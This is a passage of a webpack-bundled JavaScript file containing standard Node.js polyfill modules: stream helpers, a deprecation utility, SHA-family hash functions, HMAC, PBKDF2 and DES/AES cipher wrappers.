      copyBuffer(p.data, ret, i);
      i += p.data.length;
      p = p.next;
    }
    return ret;
  };

  return BufferList;
}();

if (util && util.inspect && util.inspect.custom) {
  module.exports.prototype[util.inspect.custom] = function () {
    var obj = util.inspect({ length: this.length });
    return this.constructor.name + ' ' + obj;
  };
}

/***/ }),
/* 2665 */
/***/ (function(module, exports) {

/* (ignored) */

/***/ }),
/* 2666 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(global) {
/**
 * Module exports.
 */

module.exports = deprecate;

/**
 * Mark that a method should not be used.
 * Returns a modified function which warns once by default.
 *
 * If `localStorage.noDeprecation = true` is set, then it is a no-op.
 *
 * If `localStorage.throwDeprecation = true` is set, then deprecated functions
 * will throw an Error when invoked.
 *
 * If `localStorage.traceDeprecation = true` is set, then deprecated functions
 * will invoke `console.trace()` instead of `console.error()`.
 *
 * @param {Function} fn - the function to deprecate
 * @param {String} msg - the string to print to the console when `fn` is invoked
 * @returns {Function} a new "deprecated" version of `fn`
 * @api public
 */

function deprecate (fn, msg) {
  if (config('noDeprecation')) {
    return fn;
  }

  var warned = false;
  function deprecated() {
    if (!warned) {
      if (config('throwDeprecation')) {
        throw new Error(msg);
      } else if (config('traceDeprecation')) {
        console.trace(msg);
      } else {
        console.warn(msg);
      }
      warned = true;
    }
    return fn.apply(this, arguments);
  }

  return deprecated;
}

/**
 * Checks `localStorage` for boolean values for the given `name`.
 *
 * @param {String} name
 * @returns {Boolean}
 * @api private
 */

function config (name) {
  // accessing global.localStorage can trigger a DOMException in sandboxed iframes
  try {
    if (!global.localStorage) return false;
  } catch (_) {
    return false;
  }
  var val = global.localStorage[name];
  if (null == val) return false;
  return String(val).toLowerCase() === 'true';
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17)))

/***/ }),
/* 2667 */,
/* 2668 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

// a passthrough stream.
// basically just the most minimal sort of Transform stream.
// Every written chunk gets output as-is.



module.exports = PassThrough;

var Transform = __webpack_require__(1238);

/*<replacement>*/
var util = __webpack_require__(347);
util.inherits = __webpack_require__(348);
/*</replacement>*/

util.inherits(PassThrough, Transform);

function PassThrough(options) {
  if (!(this instanceof PassThrough)) return new PassThrough(options);

  Transform.call(this, options);
}

PassThrough.prototype._transform = function (chunk, encoding, cb) {
  cb(null, chunk);
};

/***/ }),
/* 2669 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(688);


/***/ }),
/* 2670 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(237);


/***/ }),
/* 2671 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(686).Transform


/***/ }),
/* 2672 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(686).PassThrough


/***/ }),
/* 2673 */
/***/ (function(module, exports, __webpack_require__) {

/*
 * A JavaScript implementation of the Secure Hash Algorithm, SHA-0, as defined
 * in FIPS PUB 180-1
 * This source code is derived from sha1.js of the same repository.
 * The difference between SHA-0 and SHA-1 is just a bitwise rotate left
 * operation was added.
 */

var inherits = __webpack_require__(25)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var K = [
  0x5a827999, 0x6ed9eba1, 0x8f1bbcdc | 0, 0xca62c1d6 | 0
]

var W = new Array(80)

function Sha () {
  this.init()
  this._w = W

  Hash.call(this, 64, 56)
}

inherits(Sha, Hash)

Sha.prototype.init = function () {
  this._a = 0x67452301
  this._b = 0xefcdab89
  this._c = 0x98badcfe
  this._d = 0x10325476
  this._e = 0xc3d2e1f0

  return this
}

function rotl5 (num) {
  return (num << 5) | (num >>> 27)
}

function rotl30 (num) {
  return (num << 30) | (num >>> 2)
}

function ft (s, b, c, d) {
  if (s === 0) return (b & c) | ((~b) & d)
  if (s === 2) return (b & c) | (b & d) | (c & d)
  return b ^ c ^ d
}

Sha.prototype._update = function (M) {
  var W = this._w

  var a = this._a | 0
  var b = this._b | 0
  var c = this._c | 0
  var d = this._d | 0
  var e = this._e | 0

  for (var i = 0; i < 16; ++i) W[i] = M.readInt32BE(i * 4)
  for (; i < 80; ++i) W[i] = W[i - 3] ^ W[i - 8] ^ W[i - 14] ^ W[i - 16]

  for (var j = 0; j < 80; ++j) {
    var s = ~~(j / 20)
    var t = (rotl5(a) + ft(s, b, c, d) + e + W[j] + K[s]) | 0

    e = d
    d = c
    c = rotl30(b)
    b = a
    a = t
  }

  this._a = (a + this._a) | 0
  this._b = (b + this._b) | 0
  this._c = (c + this._c) | 0
  this._d = (d + this._d) | 0
  this._e = (e + this._e) | 0
}

Sha.prototype._hash = function () {
  var H = Buffer.allocUnsafe(20)

  H.writeInt32BE(this._a | 0, 0)
  H.writeInt32BE(this._b | 0, 4)
  H.writeInt32BE(this._c | 0, 8)
  H.writeInt32BE(this._d | 0, 12)
  H.writeInt32BE(this._e | 0, 16)

  return H
}

module.exports = Sha


/***/ }),
/* 2674 */
/***/ (function(module, exports, __webpack_require__) {

/*
 * A JavaScript implementation of the Secure Hash Algorithm, SHA-1, as defined
 * in FIPS PUB 180-1
 * Version 2.1a Copyright Paul Johnston 2000 - 2002.
 * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
 * Distributed under the BSD License
 * See http://pajhome.org.uk/crypt/md5 for details.
 */

var inherits = __webpack_require__(25)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var K = [
  0x5a827999, 0x6ed9eba1, 0x8f1bbcdc | 0, 0xca62c1d6 | 0
]

var W = new Array(80)

function Sha1 () {
  this.init()
  this._w = W

  Hash.call(this, 64, 56)
}

inherits(Sha1, Hash)

Sha1.prototype.init = function () {
  this._a = 0x67452301
  this._b = 0xefcdab89
  this._c = 0x98badcfe
  this._d = 0x10325476
  this._e = 0xc3d2e1f0

  return this
}

function rotl1 (num) {
  return (num << 1) | (num >>> 31)
}

function rotl5 (num) {
  return (num << 5) | (num >>> 27)
}

function rotl30 (num) {
  return (num << 30) | (num >>> 2)
}

function ft (s, b, c, d) {
  if (s === 0) return (b & c) | ((~b) & d)
  if (s === 2) return (b & c) | (b & d) | (c & d)
  return b ^ c ^ d
}

Sha1.prototype._update = function (M) {
  var W = this._w

  var a = this._a | 0
  var b = this._b | 0
  var c = this._c | 0
  var d = this._d | 0
  var e = this._e | 0

  for (var i = 0; i < 16; ++i) W[i] = M.readInt32BE(i * 4)
  for (; i < 80; ++i) W[i] = rotl1(W[i - 3] ^ W[i - 8] ^ W[i - 14] ^ W[i - 16])

  for (var j = 0; j < 80; ++j) {
    var s = ~~(j / 20)
    var t = (rotl5(a) + ft(s, b, c, d) + e + W[j] + K[s]) | 0

    e = d
    d = c
    c = rotl30(b)
    b = a
    a = t
  }

  this._a = (a + this._a) | 0
  this._b = (b + this._b) | 0
  this._c = (c + this._c) | 0
  this._d = (d + this._d) | 0
  this._e = (e + this._e) | 0
}

Sha1.prototype._hash = function () {
  var H = Buffer.allocUnsafe(20)

  H.writeInt32BE(this._a | 0, 0)
  H.writeInt32BE(this._b | 0, 4)
  H.writeInt32BE(this._c | 0, 8)
  H.writeInt32BE(this._d | 0, 12)
  H.writeInt32BE(this._e | 0, 16)

  return H
}

module.exports = Sha1


/***/ }),
/* 2675 */
/***/ (function(module, exports, __webpack_require__) {

/**
 * A JavaScript implementation of the Secure Hash Algorithm, SHA-256, as defined
 * in FIPS 180-2
 * Version 2.2-beta Copyright Angel Marin, Paul Johnston 2000 - 2009.
 * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
 *
 */

var inherits = __webpack_require__(25)
var Sha256 = __webpack_require__(1239)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var W = new Array(64)

function Sha224 () {
  this.init()

  this._w = W // new Array(64)

  Hash.call(this, 64, 56)
}

inherits(Sha224, Sha256)

Sha224.prototype.init = function () {
  this._a = 0xc1059ed8
  this._b = 0x367cd507
  this._c = 0x3070dd17
  this._d = 0xf70e5939
  this._e = 0xffc00b31
  this._f = 0x68581511
  this._g = 0x64f98fa7
  this._h = 0xbefa4fa4

  return this
}

Sha224.prototype._hash = function () {
  var H = Buffer.allocUnsafe(28)

  H.writeInt32BE(this._a, 0)
  H.writeInt32BE(this._b, 4)
  H.writeInt32BE(this._c, 8)
  H.writeInt32BE(this._d, 12)
  H.writeInt32BE(this._e, 16)
  H.writeInt32BE(this._f, 20)
  H.writeInt32BE(this._g, 24)

  return H
}

module.exports = Sha224


/***/ }),
/* 2676 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25)
var SHA512 = __webpack_require__(1240)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var W = new Array(160)

function Sha384 () {
  this.init()
  this._w = W

  Hash.call(this, 128, 112)
}

inherits(Sha384, SHA512)

Sha384.prototype.init = function () {
  this._ah = 0xcbbb9d5d
  this._bh = 0x629a292a
  this._ch = 0x9159015a
  this._dh = 0x152fecd8
  this._eh = 0x67332667
  this._fh = 0x8eb44a87
  this._gh = 0xdb0c2e0d
  this._hh = 0x47b5481d

  this._al = 0xc1059ed8
  this._bl = 0x367cd507
  this._cl = 0x3070dd17
  this._dl = 0xf70e5939
  this._el = 0xffc00b31
  this._fl = 0x68581511
  this._gl = 0x64f98fa7
  this._hl = 0xbefa4fa4

  return this
}

Sha384.prototype._hash = function () {
  var H = Buffer.allocUnsafe(48)

  function writeInt64BE (h, l, offset) {
    H.writeInt32BE(h, offset)
    H.writeInt32BE(l, offset + 4)
  }

  writeInt64BE(this._ah, this._al, 0)
  writeInt64BE(this._bh, this._bl, 8)
  writeInt64BE(this._ch, this._cl, 16)
  writeInt64BE(this._dh, this._dl, 24)
  writeInt64BE(this._eh, this._el, 32)
  writeInt64BE(this._fh, this._fl, 40)

  return H
}

module.exports = Sha384


/***/ }),
/* 2677 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var inherits = __webpack_require__(25)
var Buffer = __webpack_require__(41).Buffer

var Base = __webpack_require__(201)

var ZEROS = Buffer.alloc(128)
var blocksize = 64

function Hmac (alg, key) {
  Base.call(this, 'digest')
  if (typeof key === 'string') {
    key = Buffer.from(key)
  }

  this._alg = alg
  this._key = key

  if (key.length > blocksize) {
    key = alg(key)
  } else if (key.length < blocksize) {
    key = Buffer.concat([key, ZEROS], blocksize)
  }

  var ipad = this._ipad = Buffer.allocUnsafe(blocksize)
  var opad = this._opad = Buffer.allocUnsafe(blocksize)

  for (var i = 0; i < blocksize; i++) {
    ipad[i] = key[i] ^ 0x36
    opad[i] = key[i] ^ 0x5C
  }

  this._hash = [ipad]
}

inherits(Hmac, Base)

Hmac.prototype._update = function (data) {
  this._hash.push(data)
}

Hmac.prototype._final = function () {
  var h = this._alg(Buffer.concat(this._hash))
  return this._alg(Buffer.concat([this._opad, h]))
}
module.exports = Hmac


/***/ }),
/* 2678 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(1243)


/***/ }),
/* 2679 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(global, process) {var checkParameters = __webpack_require__(1245)
var defaultEncoding = __webpack_require__(1246)
var sync = __webpack_require__(1247)
var Buffer = __webpack_require__(41).Buffer

var ZERO_BUF
var subtle = global.crypto && global.crypto.subtle
var toBrowser = {
  'sha': 'SHA-1',
  'sha-1': 'SHA-1',
  'sha1': 'SHA-1',
  'sha256': 'SHA-256',
  'sha-256': 'SHA-256',
  'sha384': 'SHA-384',
  'sha-384': 'SHA-384',
  'sha-512': 'SHA-512',
  'sha512': 'SHA-512'
}
var checks = []
function checkNative (algo) {
  if (global.process && !global.process.browser) {
    return Promise.resolve(false)
  }
  if (!subtle || !subtle.importKey || !subtle.deriveBits) {
    return Promise.resolve(false)
  }
  if (checks[algo] !== undefined) {
    return checks[algo]
  }
  ZERO_BUF = ZERO_BUF || Buffer.alloc(8)
  var prom = browserPbkdf2(ZERO_BUF, ZERO_BUF, 10, 128, algo)
    .then(function () {
      return true
    }).catch(function () {
      return false
    })
  checks[algo] = prom
  return prom
}

function browserPbkdf2 (password, salt, iterations, length, algo) {
  return subtle.importKey(
    'raw', password, {name: 'PBKDF2'}, false, ['deriveBits']
  ).then(function (key) {
    return subtle.deriveBits({
      name: 'PBKDF2',
      salt: salt,
      iterations: iterations,
      hash: {
        name: algo
      }
    }, key, length << 3)
  }).then(function (res) {
    return Buffer.from(res)
  })
}

function resolvePromise (promise, callback) {
  promise.then(function (out) {
    process.nextTick(function () {
      callback(null, out)
    })
  }, function (e) {
    process.nextTick(function () {
      callback(e)
    })
  })
}
module.exports = function (password, salt, iterations, keylen, digest, callback) {
  if (typeof digest === 'function') {
    callback = digest
    digest = undefined
  }

  digest = digest || 'sha1'
  var algo = toBrowser[digest.toLowerCase()]

  if (!algo || typeof global.Promise !== 'function') {
    return process.nextTick(function () {
      var out
      try {
        out = sync(password, salt, iterations, keylen, digest)
      } catch (e) {
        return callback(e)
      }
      callback(null, out)
    })
  }

  checkParameters(password, salt, iterations, keylen)
  if (typeof callback !== 'function') throw new Error('No callback provided to pbkdf2')
  if (!Buffer.isBuffer(password)) password = Buffer.from(password, defaultEncoding)
  if (!Buffer.isBuffer(salt)) salt = Buffer.from(salt, defaultEncoding)

  resolvePromise(checkNative(algo).then(function (resp) {
    if (resp) return browserPbkdf2(password, salt, iterations, keylen, algo)

    return sync(password, salt, iterations, keylen, digest)
  }), callback)
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17), __webpack_require__(83)))

/***/ }),
/* 2680 */
/***/ (function(module, exports, __webpack_require__) {

var DES = __webpack_require__(2681)
var aes = __webpack_require__(692)
var aesModes = __webpack_require__(693)
var desModes = __webpack_require__(2697)
var ebtk = __webpack_require__(489)

function createCipher (suite, password) {
  suite = suite.toLowerCase()

  var keyLen, ivLen
  if (aesModes[suite]) {
    keyLen = aesModes[suite].key
    ivLen = aesModes[suite].iv
  } else if (desModes[suite]) {
    keyLen = desModes[suite].key * 8
    ivLen = desModes[suite].iv
  } else {
    throw new TypeError('invalid suite type')
  }

  var keys = ebtk(password, false, keyLen, ivLen)
  return createCipheriv(suite, keys.key, keys.iv)
}

function createDecipher (suite, password) {
  suite = suite.toLowerCase()

  var keyLen, ivLen
  if (aesModes[suite]) {
    keyLen = aesModes[suite].key
    ivLen = aesModes[suite].iv
  } else if (desModes[suite]) {
    keyLen = desModes[suite].key * 8
    ivLen = desModes[suite].iv
  } else {
    throw new TypeError('invalid suite type')
  }

  var keys = ebtk(password, false, keyLen, ivLen)
  return createDecipheriv(suite, keys.key, keys.iv)
}

function createCipheriv (suite, key, iv) {
  suite = suite.toLowerCase()
  if (aesModes[suite]) return aes.createCipheriv(suite, key, iv)
  if (desModes[suite]) return new DES({ key: key, iv: iv, mode: suite })

  throw new TypeError('invalid suite type')
}

function createDecipheriv (suite, key, iv) {
  suite = suite.toLowerCase()
  if (aesModes[suite]) return aes.createDecipheriv(suite, key, iv)
  if (desModes[suite]) return new DES({ key: key, iv: iv, mode: suite, decrypt: true })

  throw new TypeError('invalid suite type')
}

function getCiphers () {
  return Object.keys(desModes).concat(aes.getCiphers())
}

exports.createCipher = exports.Cipher = createCipher
exports.createCipheriv = exports.Cipheriv = createCipheriv
exports.createDecipher = exports.Decipher = createDecipher
exports.createDecipheriv = exports.Decipheriv = createDecipheriv
exports.listCiphers = exports.getCiphers = getCiphers


/***/ }),
/* 2681 */
/***/ (function(module, exports, __webpack_require__) {

var CipherBase = __webpack_require__(201)
var des = __webpack_require__(691)
var inherits = __webpack_require__(25)
var Buffer = __webpack_require__(41).Buffer

var modes = {
  'des-ede3-cbc': des.CBC.instantiate(des.EDE),
  'des-ede3': des.EDE,
  'des-ede-cbc': des.CBC.instantiate(des.EDE),
  'des-ede': des.EDE,
  'des-cbc': des.CBC.instantiate(des.DES),
  'des-ecb': des.DES
}
modes.des = modes['des-cbc']
modes.des3 = modes['des-ede3-cbc']
module.exports = DES
inherits(DES, CipherBase)
function DES (opts) {
  CipherBase.call(this)
  var modeName = opts.mode.toLowerCase()
  var mode = modes[modeName]
  var type
  if (opts.decrypt) {
    type = 'decrypt'
  } else {
    type = 'encrypt'
  }
  var key = opts.key
  if (!Buffer.isBuffer(key)) {
    key = Buffer.from(key)
  }
  if (modeName === 'des-ede' || modeName === 'des-ede-cbc') {
    key = Buffer.concat([key, key.slice(0, 8)])
  }
  var iv = opts.iv
  if (!Buffer.isBuffer(iv)) {
    iv = Buffer.from(iv)
  }
  this._des = mode.create({
    key: key,
    iv: iv,
    type: type
  })
}
DES.prototype._update = function (data) {
  return Buffer.from(this._des.update(data))
}
DES.prototype._final = function () {
  return Buffer.from(this._des.final())
}


/***/ }),
/* 2682 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


exports.readUInt32BE = function readUInt32BE(bytes, off) {
  var res =  (bytes[0 + off] << 24) |
             (bytes[1 + off] << 16) |
             (bytes[2 + off] << 8) |
             bytes[3 + off];
  return res >>> 0;
};

exports.writeUInt32BE = function writeUInt32BE(bytes, value, off) {
  bytes[0 + off] = value >>> 24;
  bytes[1 + off] = (value >>> 16) & 0xff;
  bytes[2 + off] = (value >>> 8) & 0xff;
  bytes[3 + off] = value & 0xff;
};

exports.ip = function ip(inL, inR, out, off) {
  var outL = 0;
  var outR = 0;

  for (var i = 6; i >= 0; i -= 2) {
    for (var j = 0; j <= 24; j += 8) {
      outL <<= 1;
      outL |= (inR >>> (j + i)) & 1;
    }
    for (var j = 0; j <= 24; j += 8) {
      outL <<= 1;
      outL |= (inL >>> (j + i)) & 1;
    }
  }

  for (var i = 6; i >= 0; i -= 2) {
    for (var j = 1; j <= 25; j += 8) {
      outR <<= 1;
      outR |= (inR >>> (j + i)) & 1;
    }
    for (var j = 1; j <= 25; j += 8) {
      outR <<= 1;
      outR |= (inL >>> (j + i)) & 1;
    }
  }

  out[off + 0] = outL >>> 0;
  out[off + 1] = outR >>> 0;
};

exports.rip = function rip(inL, inR, out, off) {
  var outL = 0;
  var outR = 0;

  for (var i = 0; i < 4; i++) {
    for (var j = 24; j >= 0; j -= 8) {
      outL <<= 1;
      outL |= (inR >>> (j + i)) & 1;
      outL <<= 1;
      outL |= (inL >>> (j + i)) & 1;
    }
  }
  for (var i = 4; i < 8; i++) {
    for (var j = 24; j >= 0; j -= 8) {
      outR <<= 1;
      outR |= (inR >>> (j + i)) & 1;
      outR <<= 1;
      outR |= (inL >>> (j + i)) & 1;
    }
  }

  out[off + 0] = outL >>> 0;
  out[off + 1] = outR >>> 0;
};

exports.pc1 = function pc1(inL, inR, out, off) {
  var outL = 0;
  var outR = 0;

  // 7, 15, 23, 31, 39, 47, 55, 63
  // 6, 14, 22, 30, 39, 47, 55, 63
  // 5, 13, 21, 29, 39, 47, 55, 63
  // 4, 12, 20, 28
  for (var i = 7; i >= 5; i--) {
    for (var j = 0; j <= 24; j += 8) {
      outL <<= 1;
      outL |= (inR >> (j + i)) & 1;
    }
    for (var j = 0; j <= 24; j += 8) {
      outL <<= 1;
      outL |= (inL >> (j + i)) & 1;
    }
  }
  for (var j = 0; j <= 24; j += 8) {
    outL <<= 1;
    outL |= (inR >> (j + i)) & 1;
  }

  // 1, 9, 17, 25, 33, 41, 49, 57
  // 2, 10, 18, 26, 34, 42, 50, 58
  // 3, 11, 19, 27, 35, 43, 51, 59
  // 36, 44, 52, 60
  for (var i = 1; i <= 3; i++) {
    for (var j = 0; j <= 24; j += 8) {
      outR <<= 1;
      outR |= (inR >> (j + i)) & 1;
    }
    for (var j = 0; j <= 24; j += 8) {
      outR <<= 1;
      outR |= (inL >> (j + i)) & 1;
    }
  }
  for (var j = 0; j <= 24; j += 8) {
    outR <<= 1;
    outR |= (inL >> (j + i)) & 1;
  }

  out[off + 0] = outL >>> 0;
  out[off + 1] = outR >>> 0;
};

exports.r28shl = function r28shl(num, shift) {
  return ((num << shift) & 0xfffffff) | (num >>> (28 - shift));
};

var pc2table = [
  // inL => outL
  14, 11, 17, 4, 27, 23, 25, 0,
  13, 22, 7, 18, 5, 9, 16, 24,
  2, 20, 12, 21, 1, 8, 15, 26,

  // inR => outR
  15, 4, 25, 19, 9, 1, 26, 16,
  5, 11, 23, 8, 12, 7, 17, 0,
  22, 3, 10, 14, 6, 20, 27, 24
];

exports.pc2 = function pc2(inL, inR, out, off) {
  var outL = 0;
  var outR = 0;

  var len = pc2table.length >>> 1;
  for (var i = 0; i < len; i++) {
    outL <<= 1;
    outL |= (inL >>> pc2table[i]) & 0x1;
  }
  for (var i = len; i < pc2table.length; i++) {
    outR <<= 1;
    outR |= (inR >>> pc2table[i]) & 0x1;
  }

  out[off + 0] = outL >>> 0;
  out[off + 1] = outR >>> 0;
};

exports.expand = function expand(r, out, off) {
  var outL = 0;
  var outR = 0;

  outL = ((r & 1) << 5) | (r >>> 27);
  for (var i = 23; i >= 15; i -= 4) {
    outL <<= 6;
    outL |= (r >>> i) & 0x3f;
  }
  for (var i = 11; i >= 3; i -= 4) {
    outR |= (r >>> i) & 0x3f;
    outR <<= 6;
  }
  outR |= ((r & 0x1f) << 1) | (r >>> 31);

  out[off + 0] = outL >>> 0;
  out[off + 1] = outR >>> 0;
};

var sTable = [
  14, 0, 4, 15, 13, 7, 1, 4, 2, 14, 15, 2, 11, 13, 8, 1,
  3, 10, 10, 6, 6, 12, 12, 11, 5, 9, 9, 5, 0, 3, 7, 8,
  4, 15, 1, 12, 14, 8, 8, 2, 13, 4, 6, 9, 2, 1, 11, 7,
  15, 5, 12, 11, 9, 3, 7, 14, 3, 10, 10, 0, 5, 6, 0, 13,

  15, 3, 1, 13, 8, 4, 14, 7, 6, 15, 11, 2, 3, 8, 4, 14,
  9, 12, 7, 0, 2, 1, 13, 10, 12, 6, 0, 9, 5, 11, 10, 5,
  0, 13, 14, 8, 7, 10, 11, 1, 10, 3, 4, 15, 13, 4, 1, 2,
  5, 11, 8, 6, 12, 7, 6, 12, 9, 0, 3, 5, 2, 14, 15, 9,

  10, 13, 0, 7, 9, 0, 14, 9, 6, 3, 3, 4, 15, 6, 5, 10,
  1, 2, 13, 8, 12, 5, 7, 14, 11, 12, 4, 11, 2, 15, 8, 1,
  13, 1, 6, 10, 4, 13, 9, 0, 8, 6, 15, 9, 3, 8, 0, 7,
  11, 4, 1, 15, 2, 14, 12, 3, 5, 11, 10, 5, 14, 2, 7, 12,

  7, 13, 13, 8, 14, 11, 3, 5, 0, 6, 6, 15, 9, 0, 10, 3,
  1, 4, 2, 7, 8, 2, 5, 12, 11, 1, 12, 10, 4, 14, 15, 9,
  10, 3, 6, 15, 9, 0, 0, 6, 12, 10, 11, 1, 7, 13, 13, 8,
  15, 9, 1, 4, 3, 5, 14, 11, 5, 12, 2, 7, 8, 2, 4, 14,

  2, 14, 12, 11, 4, 2, 1, 12, 7, 4, 10, 7, 11, 13, 6, 1,
  8, 5, 5, 0, 3, 15, 15, 10, 13, 3, 0, 9, 14, 8, 9, 6,
  4, 11, 2, 8, 1, 12, 11, 7, 10, 1, 13, 14, 7, 2, 8, 13,
  15, 6, 9, 15, 12, 0, 5, 9, 6, 10, 3, 4, 0, 5, 14, 3,

  12, 10, 1, 15, 10, 4, 15, 2, 9, 7, 2, 12, 6, 9, 8, 5,
  0, 6, 13, 1, 3, 13, 4, 14, 14, 0, 7, 11, 5, 3, 11, 8,
  9, 4, 14, 3, 15, 2, 5, 12, 2, 9, 8, 5, 12, 15, 3, 10,
  7, 11, 0, 14, 4, 1, 10, 7, 1, 6, 13, 0, 11, 8, 6, 13,

  4, 13, 11, 0, 2, 11, 14, 7, 15, 4, 0, 9, 8, 1, 13, 10,
  3, 14, 12, 3, 9, 5, 7, 12, 5, 2, 10, 15, 6, 8, 1, 6,
  1, 6, 4, 11, 11, 13, 13, 8, 12, 1, 3, 4, 7, 10, 14, 7,
  10, 9, 15, 5, 6, 0, 8, 15, 0, 14, 5, 2, 9, 3, 2, 12,

  13, 1, 2, 15, 8, 13, 4, 8, 6, 10, 15, 3, 11, 7, 1, 4,
  10, 12, 9, 5, 3, 6, 14, 11, 5, 0, 0, 14, 12, 9, 7, 2,
  7, 2, 11, 1, 4, 14, 1, 7, 9, 4, 12, 10, 14, 8, 2, 13,
  0, 15, 6, 12, 10, 9, 13, 0, 15, 3, 3, 5, 5, 6, 8, 11
];

exports.substitute = function substitute(inL, inR) {
  var out = 0;
  for (var i = 0; i < 4; i++) {
    var b = (inL >>> (18 - i * 6)) & 0x3f;
    var sb = sTable[i * 0x40 + b];

    out <<= 4;
    out |= sb;
  }
  for (var i = 0; i < 4; i++) {
    var b = (inR >>> (18 - i * 6)) & 0x3f;
    var sb = sTable[4 * 0x40 + i * 0x40 + b];

    out <<= 4;
    out |= sb;
  }
  return out >>> 0;
};

var permuteTable = [
  16, 25, 12, 11, 3, 20, 4, 15, 31, 17, 9, 6, 27, 14, 1, 22,
  30, 24, 8, 18, 0, 5, 29, 23, 13, 19, 2, 26, 10, 21, 28, 7
];

exports.permute = function permute(num) {
  var out = 0;
  for (var i = 0; i < permuteTable.length; i++) {
    out <<= 1;
    out |= (num >>> permuteTable[i]) & 0x1;
  }
  return out >>> 0;
};

exports.padSplit = function padSplit(num, size, group) {
  var str = num.toString(2);
  while (str.length < size)
    str = '0' + str;

  var out = [];
  for (var i = 0; i < size; i += group)
    out.push(str.slice(i, i + group));
  return out.join(' ');
};


/***/ }),
/* 2683 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var assert = __webpack_require__(124);

function Cipher(options) {
  this.options = options;

  this.type = this.options.type;
  this.blockSize = 8;
  this._init();

  this.buffer = new Array(this.blockSize);
  this.bufferOff = 0;
}
module.exports = Cipher;

Cipher.prototype._init = function _init() {
  // Might be overrided
};

Cipher.prototype.update = function update(data) {
  if (data.length === 0)
    return [];

  if (this.type === 'decrypt')
    return this._updateDecrypt(data);
  else
    return this._updateEncrypt(data);
};

Cipher.prototype._buffer = function _buffer(data, off) {
  // Append data to buffer
  var min = Math.min(this.buffer.length - this.bufferOff, data.length - off);
  for (var i = 0; i < min; i++)
    this.buffer[this.bufferOff + i] = data[off + i];
  this.bufferOff += min;

  // Shift next
  return min;
};

Cipher.prototype._flushBuffer = function _flushBuffer(out, off) {
  this._update(this.buffer, 0, out, off);
  this.bufferOff = 0;
  return this.blockSize;
};

Cipher.prototype._updateEncrypt = function _updateEncrypt(data) {
  var inputOff = 0;
  var outputOff = 0;

  var count = ((this.bufferOff + data.length) / this.blockSize) | 0;
  var out = new Array(count * this.blockSize);

  if (this.bufferOff !== 0) {
    inputOff += this._buffer(data, inputOff);

    if (this.bufferOff === this.buffer.length)
      outputOff += this._flushBuffer(out, outputOff);
  }

  // Write blocks
  var max = data.length - ((data.length - inputOff) % this.blockSize);
  for (; inputOff < max; inputOff += this.blockSize) {
    this._update(data, inputOff, out, outputOff);
    outputOff += this.blockSize;
  }

  // Queue rest
  for (; inputOff < data.length; inputOff++, this.bufferOff++)
    this.buffer[this.bufferOff] = data[inputOff];

  return out;
};

Cipher.prototype._updateDecrypt = function _updateDecrypt(data) {
  var inputOff = 0;
  var outputOff = 0;

  var count = Math.ceil((this.bufferOff + data.length) / this.blockSize) - 1;
  var out = new Array(count * this.blockSize);

  // TODO(indutny): optimize it, this is far from optimal
  for (; count > 0; count--) {
    inputOff += this._buffer(data, inputOff);
    outputOff += this._flushBuffer(out, outputOff);
  }

  // Buffer rest of the input
  inputOff += this._buffer(data, inputOff);

  return out;
};

Cipher.prototype.final = function final(buffer) {
  var first;
  if (buffer)
    first = this.update(buffer);

  var last;
  if (this.type === 'encrypt')
    last = this._finalEncrypt();
  else
    last = this._finalDecrypt();

  if (first)
    return first.concat(last);
  else
    return last;
};

Cipher.prototype._pad = function _pad(buffer, off) {
  if (off === 0)
    return false;

  while (off < buffer.length)
    buffer[off++] = 0;

  return true;
};

Cipher.prototype._finalEncrypt = function _finalEncrypt() {
  if (!this._pad(this.buffer, this.bufferOff))
    return [];

  var out = new Array(this.blockSize);
  this._update(this.buffer, 0, out, 0);
  return out;
};

Cipher.prototype._unpad = function _unpad(buffer) {
  return buffer;
};

Cipher.prototype._finalDecrypt = function _finalDecrypt() {
  assert.equal(this.bufferOff, this.blockSize, 'Not enough data to decrypt');
  var out = new Array(this.blockSize);
  this._flushBuffer(out, 0);

  return this._unpad(out);
};


/***/ }),
/* 2684 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


var assert = __webpack_require__(124);
var inherits = __webpack_require__(25);

var des = __webpack_require__(691);
var utils = des.utils;
var Cipher = des.Cipher;

function DESState() {
  this.tmp = new Array(2);
  this.keys = null;
}

